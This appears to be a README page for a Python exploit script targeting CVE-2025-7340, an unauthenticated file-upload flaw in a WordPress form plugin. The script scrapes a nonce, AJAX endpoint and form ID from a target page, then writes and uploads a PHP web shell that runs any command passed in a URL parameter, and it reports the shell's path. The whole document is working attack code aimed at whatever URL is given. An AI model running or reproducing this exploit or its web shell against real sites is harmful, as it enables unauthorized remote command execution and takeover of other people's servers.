README.md
Rendering markdown...
import re
import requests
import argparse
import time
from colorama import init, Fore, Style
# By : Nxploited (Khaled_alenazi)
init(autoreset=True)
class Nxploited:
def __init__(self, target_url):
self.target_url = target_url.rstrip("/")
self.session = requests.Session()
self.session.verify = False
requests.packages.urllib3.disable_warnings()
self.session.headers.update({
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome Safari"
})
self.nonce = None
self.ajax_url = None
self.form_id = None
def run(self):
print(Fore.CYAN + "Starting exploit against target...")
time.sleep(1)
self.fetch_target_page()
self.extract_parameters()
self.generate_shell()
self.upload_shell()
def fetch_target_page(self):
print(Fore.YELLOW + "Fetching target page...")
response = self.session.get(self.target_url)
if response.status_code != 200:
raise Exception("Failed to fetch target page")
self.page_content = response.text
def extract_parameters(self):
print(Fore.YELLOW + "Extracting parameters...")
time.sleep(0.8)
self.nonce = self.extract_nonce()
self.ajax_url = self.extract_ajax_url()
self.form_id = self.extract_form_id()
self.print_info("Extracted Nonce", self.nonce, Fore.GREEN)
time.sleep(0.3)
self.print_info("AJAX Endpoint", self.ajax_url, Fore.GREEN)
time.sleep(0.3)
self.print_info("Form ID", self.form_id, Fore.GREEN)
if not all([self.nonce, self.ajax_url, self.form_id]):
raise Exception("Missing required parameters")
def extract_nonce(self):
match = re.search(r'"nonce":"([a-f0-9]+)"', self.page_content)
return match.group(1) if match else None
def extract_ajax_url(self):
match = re.search(r'"ajaxurl":"(http[^"]+)"', self.page_content)
return match.group(1).replace("\\/", "/") if match else None
def extract_form_id(self):
match = re.search(r'<form[^>]+data-form-id=["\']?(\d+)', self.page_content)
return match.group(1) if match else None
def generate_shell(self):
print(Fore.YELLOW + "Generating webshell...")
shell_code = """<?php
echo "Nxploited<br>";
if(isset($_GET['cmd'])) {
echo "<pre>";
system($_GET['cmd']);
echo "</pre>";
}
?>"""
with open("shell.php", "w") as f:
f.write(shell_code)
def upload_shell(self):
print(Fore.YELLOW + "Uploading shell, please wait...")
time.sleep(1)
files = {
"action": (None, "ht_form_temp_file_upload"),
"_wpnonce": (None, self.nonce),
"form_id": (None, self.form_id),
"ht_form_file": ("shell.php", open("shell.php", "rb"), "application/x-php")
}
response = self.session.post(self.ajax_url, files=files)
result = response.json()
if result.get("success"):
file_id = result["data"].get("file_id", "")
shell_path = f"wp-content/uploads/ht_form/temp/{file_id}"
print(Fore.GREEN + Style.BRIGHT + "\n[+] Exploit Successfully!\n")
Nxploited.print_info("Go to", shell_path, Fore.MAGENTA + Style.BRIGHT)
print(Fore.CYAN + "\nExploit by: Khaled Alenazi (Nxploited) - GitHub: https://github.com/Nxploited\n")
else:
print(Fore.RED + "Upload failed or unexpected response")
@staticmethod
def print_info(label, value, color=Fore.WHITE):
print(f"{color}{label}: {value}")
def main():
parser = argparse.ArgumentParser(
description="Exploit for CVE-2025-7340 - Unauthenticated Arbitrary File Upload | by Khaled Alenazi (Nxploited)"
)
parser.add_argument("-u", "--url", required=True, help="Target URL e.g http(s)://target.com")
args = parser.parse_args()
exploit = Nxploited(args.url)
try:
exploit.run()
except Exception as e:
print(Fore.RED + f"Error: {e}")
if __name__ == "__main__":
main()